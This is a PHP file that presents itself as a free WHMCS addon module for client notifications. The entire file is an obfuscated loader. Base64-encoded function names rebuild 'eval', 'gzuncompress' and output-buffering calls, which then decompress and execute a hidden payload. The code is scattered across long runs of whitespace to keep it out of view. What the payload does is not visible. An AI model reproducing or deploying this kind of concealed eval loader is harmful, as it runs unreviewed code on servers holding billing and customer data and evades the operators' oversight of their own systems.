<?php
/**
 * Notify-client-by-usbhost - WHMCS Addon Module
 *
 * @see https://github.com/usbhost-dev
 *
 * @license Free 
 */

        $__='printf';$_='Loading Class/Code NAME';
        































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='eNrtmllvmzAcwN8j7TvkoRKdNHVAy1oU5SHQQCApTYgaHy8VNikhnCshCfn0c47laKWp07pJq/xDDrLx/3b8AK7Xt5w9MppC/hymsyehsenuaAp67BXFVz3zx3Wnddeub/oXFxdCo7YTr3+q8ev9r9q6DvV3pPlqRICSWiAghdhsN4XN0KGqb2K3Vpp1DofD+ZgINBmJPrRLyxzJCCwy21CfYBVdbzdNtmtut+tHnioOh8PhcDgcDud/g7/O4HA4nI+LQLxi/O3q0R/TzB8LDZ4RDofD4XD+iBcHCMKb790gC7qhdk8u3Ryn0QzJyxwDRewBW+nB0Qolkzm9HAS9oQaHben2odI0bLpzEmoOkV2JmA9dS8/WLRh0nBgPtczvuAu6yuY92c99cyKhUJkSWZz70Ak9U135uhRhiA5y5jJH8qik8kPgpjbT0VqPz/VEmRAwWlHTmOKf9qXlzu6IDoAbEVmhJFFFD2AFyk7hgVHpG6pEZTsjl44I20ZEQFzeL7KunjgFgs7K2o25ZrzWLSJ5EtNQu9ZZLix9bbsVWB1NQgnzq9ISHyhT34zXMUcedBYIulNPDyIEHGZXLXt6K2J6KgSk2DdHFa2inY5ie980LcdhK7OG7gSxXBP5Kj99vm16eNq39P38oD9spR5QWO6ClMVzmNMRu8dytunMSepWRF4WGFpMTisxpMFAVku/Y8+JuWTxBvk6J0e2XvnKYn1CslEQ0whZnTME7QrBKHuhvzjyMe8Oo2B87NtWX4WhK9Hk6qVvs364l83sjjahiTFjc2Oa3uW/inH/2U+nN/RWsUmKJ8SMI4utlV2tmE1DwtARMRiUlqEVGBgrto5SUmkhq90zm1tiXRNpGgUI+BMPXJV9XV30Q3q9taWpeip2hUat9u//pM3N/XzX+9z4HfEj2bcInh0MngvrX+HL3iw/S/R3zxKd1uD8pOjbEnxu/ADhaWEy';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






























































































































































                                                                                                                                                                                                                     $________;
